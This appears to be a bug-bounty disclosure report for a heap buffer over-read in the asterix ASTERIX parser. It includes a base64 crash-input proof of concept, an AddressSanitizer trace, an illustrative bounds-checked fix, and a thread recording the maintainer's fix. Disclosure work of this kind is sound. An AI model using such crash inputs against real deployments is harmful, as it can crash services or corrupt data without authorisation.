Heap-based Buffer Overflow in croatiacontrolltd/asterix

Valid

Reported on

May 21st 2021


✍️ Description

Whilst experimenting with asterix, built from commit f44cfea, compiled with Clang 10 (+ ASan) on Ubuntu 20.04.2 LTS, we are able to induce a heap-buffer-overflow in DataItemBits::getBits (asterix/src/asterix/DataItemBits.cpp:125).

Because getBits performs no bounds checking, when the software encounters a malformed file like the one in our PoC it logs ERROR: May 21 21:08:19 2021 (/root/asterix/src/asterix/asterixformat.cxx) Wrong data length in Explicit. Needed=3 and there is 4 bytes. and then reads past the end of the heap buffer, overflowing it by 1 byte.


🕵️‍♂️ Proof of Concept

echo "FQAsxR0xAUMjBAABAUDUtz76ZboAAAE4QXY62rn1AAIACMtUDQ0NBQjwaGV4AC/FHTEBQyMEAAEBQCu3OvplswAAAjhBlQpIWgwAAhUIrVUBEAoKCv8FCHDxQA==" | base64 -d > /tmp/fuzz.file && cat /tmp/fuzz.file | ./asterix

Running the above command line produces this ASan stack trace:

==2911984==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000215 at pc 0x0000004ffd53 bp 0x7ffcca11d530 sp 0x7ffcca11d528
READ of size 1 at 0x602000000215 thread T0
    #0 0x4ffd52 in DataItemBits::getBits(unsigned char*, int, int, int) /root/asterix/src/asterix/DataItemBits.cpp:125:36
    #1 0x4ffd52 in DataItemBits::getUnsigned(unsigned char*, int, int, int) /root/asterix/src/asterix/DataItemBits.cpp:160:31
    #2 0x4ffd52 in DataItemBits::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemBits.cpp:471:35
    #3 0x50c9da in DataItemFormatFixed::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemFormatFixed.cpp:180:20
    #4 0x507a30 in DataItemFormatCompound::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemFormatCompound.cpp:164:38
    #5 0x509e25 in DataItemFormatExplicit::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemFormatExplicit.cpp:88:24
    #6 0x4ea3e6 in DataItemDescription::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemDescription.h:48:27
    #7 0x4ea3e6 in DataItem::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/DataItem.cpp:72:34
    #8 0x515889 in DataRecord::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/DataRecord.cpp:205:21
    #9 0x4e7e70 in DataBlock::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/DataBlock.cpp:107:21
    #10 0x4d4ad4 in AsterixData::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/AsterixData.cpp:56:17
    #11 0x4d7bd8 in CAsterixFormat::WritePacket(CBaseFormatDescriptor&, CBaseDevice&, unsigned int, bool&) /root/asterix/src/asterix/asterixformat.cxx:129:45
    #12 0x531d9a in CChannelFactory::WritePacket(unsigned int) /root/asterix/src/engine/channelfactory.cxx:282:34
    #13 0x5369c4 in CConverterEngine::Start() /root/asterix/src/engine/converterengine.cxx:184:54
    #14 0x55dfcd in main /root/asterix/src/main/asterix.cpp:387:43
    #15 0x7fa3544160b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #16 0x429bfd in _start (/root/asterix/install/asterix+0x429bfd)

0x602000000215 is located 0 bytes to the right of 5-byte region [0x602000000210,0x602000000215)
allocated by thread T0 here:
    #0 0x4d1bbd in operator new[](unsigned long) (/root/asterix/install/asterix+0x4d1bbd)
    #1 0x4eb887 in DataItem::parse(unsigned char const*, long) /root/asterix/src/asterix/DataItem.cpp:115:19
    #2 0x513145 in DataRecord::DataRecord(Category*, int, unsigned long, unsigned char const*, double) /root/asterix/src/asterix/DataRecord.cpp:96:30
    #3 0x4e6d77 in DataBlock::DataBlock(Category*, unsigned long, unsigned char const*, double) /root/asterix/src/asterix/DataBlock.cpp:43:30
    #4 0x516a81 in InputParser::parsePacket(unsigned char const*, unsigned int, double) /root/asterix/src/asterix/InputParser.cpp:103:33
    #5 0x4e3d39 in CAsterixRawSubformat::ProcessPacket(CBaseFormatDescriptor&, CBaseDevice&, bool&, bool) /root/asterix/src/asterix/asterixrawsubformat.cxx:206:62
    #6 0x4d8404 in CAsterixFormat::ProcessPacket(CBaseFormatDescriptor&, CBaseDevice&, unsigned int, bool&) /root/asterix/src/asterix/asterixformat.cxx
    #7 0x5325b9 in CChannelFactory::ProcessPacket(bool&) /root/asterix/src/engine/channelfactory.cxx:319:27
    #8 0x536426 in CConverterEngine::Start() /root/asterix/src/engine/converterengine.cxx:147:51
    #9 0x55dfcd in main /root/asterix/src/main/asterix.cpp:387:43
    #10 0x7fa3544160b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/asterix/src/asterix/DataItemBits.cpp:125:36 in DataItemBits::getBits(unsigned char*, int, int, int)
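The missing check is the one between the requested bit range and the size of the heap region handed to getBits (a 5-byte allocation here, read at offset 5). The following bounds-checked bit extractor is an added illustration written for this page, not asterix's own getBits: its signature, 0-based MSB-first bit numbering and the out-parameter convention are assumptions, and the 5-byte buffer is constructed to mirror the region in the trace.

```cpp
#include <cstddef>
#include <cstdint>

// Extract bits [first_bit, last_bit] (0-based, counted from the MSB of data[0])
// from a buffer of 'len' bytes into *out. Returns false, without touching the
// buffer, whenever the range would reach beyond the allocation. This is a
// hypothetical replacement for an unchecked reader, not the project's code.
bool get_bits_checked(const uint8_t* data, size_t len,
                      int first_bit, int last_bit, uint64_t* out) {
    if (data == nullptr || out == nullptr) return false;
    if (first_bit < 0 || last_bit < first_bit) return false;
    if (last_bit - first_bit + 1 > 64) return false;   // result must fit uint64_t

    // The byte that holds the last requested bit must lie inside the buffer.
    // An unchecked reader would index data[last_byte] regardless of 'len',
    // which is exactly the one-byte-past-the-end read ASan reported above.
    size_t last_byte = static_cast<size_t>(last_bit) / 8;
    if (last_byte >= len) return false;

    uint64_t value = 0;
    for (int bit = first_bit; bit <= last_bit; ++bit) {
        uint8_t byte = data[static_cast<size_t>(bit) / 8];
        int shift = 7 - (bit % 8);                       // MSB first
        value = (value << 1) | ((byte >> shift) & 1u);
    }
    *out = value;
    return true;
}

// Constructed 5-byte region standing in for the [0x...210, 0x...215) allocation
// in the trace. Returns true when an in-range read succeeds and a read whose
// last bit falls in byte index 5 (one past the end) is refused.
bool reject_read_past_five_byte_region() {
    const uint8_t region[5] = {0xAB, 0xCD, 0xEF, 0x01, 0x23};  // constructed sample
    uint64_t v = 0;
    bool ok_inside = get_bits_checked(region, sizeof region, 32, 39, &v) && v == 0x23;
    bool refused   = !get_bits_checked(region, sizeof region, 33, 40, &v);
    return ok_inside && refused;
}
```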

💥 Impact

This vulnerability is capable of crashing the software or corrupting data.

Geeknik Labs
4 months ago

Researcher


@admin Can we reach out to the developers in order to get some eyes on this? Thank you.

Ziding Zhang
4 months ago

Admin


Hey Geeknik, same drill, here's a PR asking for a security policy from the repo. Tag in the maintainers to bring their attention to it.

Geeknik Labs
2 months ago

Researcher


Yet another repository uninterested in securing their code. 🤣🤣🤣🤣🤣

Geeknik Labs
2 months ago

Researcher


I’ll be requesting a CVE through Mitre and making a detailed post to the FD mailing list.

Geeknik Labs modified their report
2 months ago
Damir Salantic
2 months ago

Maintainer


Thank you for your report. The issue has been fixed in the latest release.

Jamie Slome
2 months ago

Admin


@maintainer - are you able to mark the report as valid and confirm the fix using the buttons presented?

Damir Salantic validated this vulnerability 2 months ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Damir Salantic confirmed that a fix has been merged on 3f765d 2 months ago
Damir Salantic has been awarded the fix bounty